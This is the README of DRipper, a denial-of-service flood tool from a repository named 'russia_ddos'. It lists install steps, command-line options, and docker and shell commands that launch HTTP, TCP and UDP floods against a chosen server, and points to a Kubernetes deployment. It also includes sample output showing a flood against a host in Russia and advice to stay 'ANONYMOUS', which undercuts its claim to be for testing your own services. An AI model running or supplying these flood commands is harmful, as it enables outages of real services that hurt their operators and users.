This is reworked version of DRipper. This script support HTTP/TCP/UDP flood attack. We recommend using this script for your own test purposes in the local (on-premise) environment to improve your own web services against DDoS attacks.
- Python 3.9 or better
- Docker (optional) if you'd like to run script with docker
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It is the end user's responsibility to obey all applicable laws.
It is just like a server testing script and Your IP is visible.
Please, make sure you are ANONYMOUS!
Description Status
Start Time 2022-02-24 04:00:00
Your Public IP / Country 131.*.*.* / AR
Host IP / Country / RU
Load Method UDP
Threads 50
vCPU Count 16
Random Packet Length True / Max length: 2048
CloudFlare DNS Protection Not protected
Last Availability Check 04:10:52
Host Availability Accessible in 21 of 21 zones (100%)
UDP Statistic
Duration 0:12:11
Sent Packets 10,332,191
Sent Bytes 2.22 GB
Connection Success 2
Connection Failed 29
Connection Success Rate 6%
Press CTRL+C to interrupt process.
DRipper can run on Windows/Linux/macOS from command line.
We recommend to use PowerShell
for Windows users to run the script, Linux/macOS users can use any shell.
Run dripper --help
to see detailed params description.
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It is the end user's responsibility to obey all applicable laws.
It is just like a server testing script and Your IP is visible.
Please, make sure you are ANONYMOUS!
Usage: dripper [options] arg
-h, --help show this help message and exit
-p PORT, --port=PORT port (default: 80)
-t THREADS, --threads=THREADS
threads (default: 100)
Send random packets with random length (default: 1
Max random packets length (default: 48)
Attack method: udp (default), tcp, http
-s HOST, --server=HOST
Attack to server IP
Example: dripper -s -p 80 -t 100
# HTTP flood
docker run -it --rm alexmon1989/dripper:latest -s -p 80 -t 100 -m http
# TCP flood
docker run -it --rm alexmon1989/dripper:latest -s -p 80 -t 100 -m tcp -l 2048
# UDP flood
docker run -it --rm alexmon1989/dripper:latest -s -p 80 -t 100 -m upd -l 2048
Ensure you have Python 3.9 or better installed. Then clone this repo and run with params you need
git clone
cd russia_ddos
# Install python dependencies:
pip install -r requirements.txt
# Run script
dripper -s -p 80 -t 100 -r 1 -m udp
# OR
dripper -s -p 80 -t 100 -r 1 -m udp
You can deploy and run DRipper in Kubernetes cluster using kube-dripper terraform configuration. For details - see the README from kube-dripper project.
pip install pytest
This project is distributed under the MIT License, see LICENSE for more information.